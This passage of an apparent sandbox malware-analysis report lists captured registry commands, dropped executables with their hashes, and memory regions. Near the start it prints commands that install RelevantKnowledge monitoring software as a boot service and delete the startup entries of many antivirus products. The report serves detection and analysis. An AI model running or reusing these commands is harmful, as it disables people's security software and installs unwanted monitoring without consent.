"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\7F77.exeC:\Users\Admin\AppData\Local\Temp\7F77.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7F77.exeC:\Users\Admin\AppData\Local\Temp\7F77.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 14723⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\8247.exeC:\Users\Admin\AppData\Local\Temp\8247.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 7322⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 7482⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 7522⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 8802⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 8562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Runtimebroker.exeMD5
dcebca91a83098af784295a94a03d19d
SHA1db334fe85e50fdcf0ccf8901ca7a92f57dffb90a
SHA256ec4feafda71d68f300e593568b46efaacb8a46f58ffe691c0cfb4093c0d70be9
SHA51238be2ac6cc805bb5f1fc437cf139904382801bea540a6c67d06dca1423bc43c9267d842b937b3adce4820c19151aeeeacbfcc6623183717b5550ecfadfb8db30
-
C:\ProgramData\Runtimebroker.exeMD5
dcebca91a83098af784295a94a03d19d
SHA1db334fe85e50fdcf0ccf8901ca7a92f57dffb90a
SHA256ec4feafda71d68f300e593568b46efaacb8a46f58ffe691c0cfb4093c0d70be9
SHA51238be2ac6cc805bb5f1fc437cf139904382801bea540a6c67d06dca1423bc43c9267d842b937b3adce4820c19151aeeeacbfcc6623183717b5550ecfadfb8db30
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
SHA512977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
8957a85993bcb1b0c1ff9198768acb25
SHA13b61e404a2b3d3ca507bbc75100a5301bcff4c7c
SHA25611d0df3952999565e3083e48a5920e94dc58edafc6521d7c5dfae7e32a80feb7
SHA512bc2fbc6d51dc63cfa034d612e2b8dd4d28109284f1aa1b31a5c2974a3ffe4c864532c570931d89c936b4e87e5b24fe2fd38ea265bfe3f96be8d0528fe9a69ff8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
2d0a27a3f7d7f401004c545023c2b855
SHA199106aaa83d0e623413d9674c004cbe11ce2a5bd
SHA256dafb02b2122ac6bc411ef0b18ee3f0ca6efe2c71ab70acbef38f39dc15a7d91f
SHA512861dd797a7a3b33b35a3a88ef7f1abd388beee3a6b2405cca5e1d632d21f82d3dea6d146f3c4d9f3d1674daae06006fbaf14c90fc3ef177f95803ff1fe14079f
-
C:\Users\Admin\AppData\Local\Temp\7DFF.exeMD5
dcebca91a83098af784295a94a03d19d
SHA1db334fe85e50fdcf0ccf8901ca7a92f57dffb90a
SHA256ec4feafda71d68f300e593568b46efaacb8a46f58ffe691c0cfb4093c0d70be9
SHA51238be2ac6cc805bb5f1fc437cf139904382801bea540a6c67d06dca1423bc43c9267d842b937b3adce4820c19151aeeeacbfcc6623183717b5550ecfadfb8db30
-
C:\Users\Admin\AppData\Local\Temp\7DFF.exeMD5
dcebca91a83098af784295a94a03d19d
SHA1db334fe85e50fdcf0ccf8901ca7a92f57dffb90a
SHA256ec4feafda71d68f300e593568b46efaacb8a46f58ffe691c0cfb4093c0d70be9
SHA51238be2ac6cc805bb5f1fc437cf139904382801bea540a6c67d06dca1423bc43c9267d842b937b3adce4820c19151aeeeacbfcc6623183717b5550ecfadfb8db30
-
C:\Users\Admin\AppData\Local\Temp\7F77.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\7F77.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\7F77.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\8247.exeMD5
172e2eff7900b0a783c33d5f28d65f97
SHA1d7ef3226c3f9166a0337d8a08c7cc839371f076d
SHA2567957f91cad12c3c511f3b4bed3d85cc20f4fa84090271101ad5b1a3178a98b23
SHA512f59b2ad3bb1128c3d7c26639e1d31d50c65d459d50f97e801935f1c51eefd2fe1bae4dde873db12fb8a598fdb499d4676fe9e58e372e992303aef18ca3c4265e
-
C:\Users\Admin\AppData\Local\Temp\8247.exeMD5
172e2eff7900b0a783c33d5f28d65f97
SHA1d7ef3226c3f9166a0337d8a08c7cc839371f076d
SHA2567957f91cad12c3c511f3b4bed3d85cc20f4fa84090271101ad5b1a3178a98b23
SHA512f59b2ad3bb1128c3d7c26639e1d31d50c65d459d50f97e801935f1c51eefd2fe1bae4dde873db12fb8a598fdb499d4676fe9e58e372e992303aef18ca3c4265e
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
memory/8-136-0x0000000000400000-0x0000000002C7D000-memory.dmpFilesize
40.5MB
-
memory/8-127-0x0000000002C80000-0x0000000002DCA000-memory.dmpFilesize
1.3MB
-
memory/8-118-0x0000000000000000-mapping.dmp
-
memory/1116-137-0x0000000002A70000-0x0000000002AE4000-memory.dmpFilesize
464KB
-
memory/1116-135-0x0000000002A00000-0x0000000002A6B000-memory.dmpFilesize
428KB
-
memory/1116-133-0x0000000000000000-mapping.dmp
-
memory/1216-155-0x0000000002F70000-0x0000000002F75000-memory.dmpFilesize
20KB
-
memory/1216-156-0x0000000002F60000-0x0000000002F69000-memory.dmpFilesize
36KB
-
memory/1216-154-0x0000000000000000-mapping.dmp
-
memory/1292-129-0x0000000000000000-mapping.dmp
-
memory/1292-139-0x00000000048B0000-0x0000000004941000-memory.dmpFilesize
580KB
-
memory/1292-140-0x0000000000400000-0x0000000002CA9000-memory.dmpFilesize
40.7MB
-
memory/1300-233-0x0000000000400000-0x0000000000495000-memory.dmpFilesize
596KB
-
memory/1300-220-0x0000000000400000-0x0000000000495000-memory.dmpFilesize
596KB
-
memory/1300-221-0x000000000044003F-mapping.dmp
-
memory/2220-149-0x0000000000000000-mapping.dmp
-
memory/2220-152-0x00000000007E0000-0x00000000007EF000-memory.dmpFilesize
60KB
-
memory/2220-151-0x00000000007F0000-0x00000000007F9000-memory.dmpFilesize
36KB
-
memory/2336-245-0x0000000008DB0000-0x0000000008DE3000-memory.dmpFilesize
204KB
-
memory/2336-453-0x0000000009070000-0x0000000009071000-memory.dmpFilesize
4KB
-
memory/2336-222-0x0000000000000000-mapping.dmp
-
memory/2336-236-0x0000000006982000-0x0000000006983000-memory.dmpFilesize
4KB
-
memory/2336-459-0x0000000009060000-0x0000000009061000-memory.dmpFilesize
4KB
-
memory/2336-252-0x0000000008D90000-0x0000000008D91000-memory.dmpFilesize
4KB
-
memory/2336-235-0x0000000006980000-0x0000000006981000-memory.dmpFilesize
4KB
-
memory/2336-257-0x0000000008F00000-0x0000000008F01000-memory.dmpFilesize
4KB
-
memory/2336-258-0x000000007F5B0000-0x000000007F5B1000-memory.dmpFilesize
4KB
-
memory/2336-259-0x0000000006983000-0x0000000006984000-memory.dmpFilesize
4KB
-
memory/2364-115-0x0000000000402E1A-mapping.dmp
-
memory/2364-114-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/2744-162-0x0000000002BB0000-0x0000000002BB9000-memory.dmpFilesize
36KB
-
memory/2744-160-0x0000000000000000-mapping.dmp
-
memory/2744-161-0x0000000002BC0000-0x0000000002BC4000-memory.dmpFilesize
16KB
-
memory/2884-215-0x0000000009430000-0x0000000009431000-memory.dmpFilesize
4KB
-
memory/2884-207-0x00000000079E0000-0x00000000079E1000-memory.dmpFilesize
4KB
-
memory/2884-219-0x0000000008EB0000-0x000000000900B000-memory.dmpFilesize
1.4MB
-
memory/2884-211-0x0000000004290000-0x0000000004291000-memory.dmpFilesize
4KB
-
memory/2884-194-0x0000000000000000-mapping.dmp
-
memory/2884-212-0x0000000004292000-0x0000000004293000-memory.dmpFilesize
4KB
-
memory/2884-217-0x0000000004293000-0x0000000004294000-memory.dmpFilesize
4KB
-
memory/2892-478-0x0000000000000000-mapping.dmp
-
memory/2984-117-0x00000000010D0000-0x00000000010E6000-memory.dmpFilesize
88KB
-
memory/3004-167-0x00000000032C0000-0x00000000032C5000-memory.dmpFilesize
20KB
-
memory/3004-168-0x00000000032B0000-0x00000000032B9000-memory.dmpFilesize
36KB
-
memory/3004-166-0x0000000000000000-mapping.dmp
-
memory/3088-143-0x0000000000000000-mapping.dmp
-
memory/3088-147-0x0000000002970000-0x0000000002977000-memory.dmpFilesize
28KB
-
memory/3088-148-0x0000000002960000-0x000000000296B000-memory.dmpFilesize
44KB
-
memory/3352-138-0x0000000000000000-mapping.dmp
-
memory/3352-142-0x0000000000DC0000-0x0000000000DCC000-memory.dmpFilesize
48KB
-
memory/3352-141-0x0000000000DD0000-0x0000000000DD7000-memory.dmpFilesize
28KB
-
memory/3400-163-0x0000000000000000-mapping.dmp
-
memory/3400-164-0x00000000001D0000-0x00000000001D5000-memory.dmpFilesize
20KB
-
memory/3400-165-0x00000000001C0000-0x00000000001C9000-memory.dmpFilesize
36KB
-
memory/3544-189-0x0000000009200000-0x0000000009201000-memory.dmpFilesize
4KB
-
memory/3544-172-0x00000000049D0000-0x00000000049D1000-memory.dmpFilesize
4KB
-
memory/3544-178-0x00000000049B0000-0x00000000049B1000-memory.dmpFilesize
4KB
-
memory/3544-195-0x00000000049B3000-0x00000000049B4000-memory.dmpFilesize
4KB
-
memory/3544-177-0x0000000007EE0000-0x0000000007EE1000-memory.dmpFilesize
4KB
-
memory/3544-176-0x0000000007DF0000-0x0000000007DF1000-memory.dmpFilesize
4KB
-
memory/3544-175-0x0000000007AF0000-0x0000000007AF1000-memory.dmpFilesize
4KB
-
memory/3544-174-0x0000000007A50000-0x0000000007A51000-memory.dmpFilesize
4KB
-
memory/3544-173-0x00000000073F0000-0x00000000073F1000-memory.dmpFilesize
4KB
-
memory/3544-188-0x0000000009190000-0x0000000009191000-memory.dmpFilesize
4KB
-
memory/3544-169-0x0000000000000000-mapping.dmp
-
memory/3544-179-0x00000000049B2000-0x00000000049B3000-memory.dmpFilesize
4KB
-
memory/3544-187-0x0000000009510000-0x0000000009511000-memory.dmpFilesize
4KB
-
memory/3544-182-0x00000000084C0000-0x00000000084C1000-memory.dmpFilesize
4KB
-
memory/3544-181-0x00000000086C0000-0x00000000086C1000-memory.dmpFilesize
4KB
-
memory/3544-180-0x0000000007C20000-0x0000000007C21000-memory.dmpFilesize
4KB
-
memory/3592-158-0x0000000000AD0000-0x0000000000AD6000-memory.dmpFilesize
24KB
-
memory/3592-157-0x0000000000000000-mapping.dmp
-
memory/3592-159-0x0000000000AC0000-0x0000000000ACC000-memory.dmpFilesize
48KB
-
memory/3788-116-0x00000000001D0000-0x00000000001DA000-memory.dmpFilesize
40KB
-
memory/3844-150-0x0000000002F00000-0x000000000304A000-memory.dmpFilesize
1.3MB
-
memory/3844-144-0x0000000000000000-mapping.dmp
-
memory/3844-153-0x0000000000400000-0x0000000002C7D000-memory.dmpFilesize
40.5MB
-
memory/4088-134-0x0000000004D10000-0x000000000520E000-memory.dmpFilesize
5.0MB
-
memory/4088-132-0x0000000004D50000-0x0000000004D51000-memory.dmpFilesize
4KB
-
memory/4088-128-0x0000000004DB0000-0x0000000004DB1000-memory.dmpFilesize
4KB
-
memory/4088-126-0x0000000005210000-0x0000000005211000-memory.dmpFilesize
4KB
-
memory/4088-124-0x00000000003B0000-0x00000000003B1000-memory.dmpFilesize
4KB
-
memory/4088-121-0x0000000000000000-mapping.dmp
-
memory/4088-218-0x0000000004EC0000-0x0000000004EE1000-memory.dmpFilesize
132KB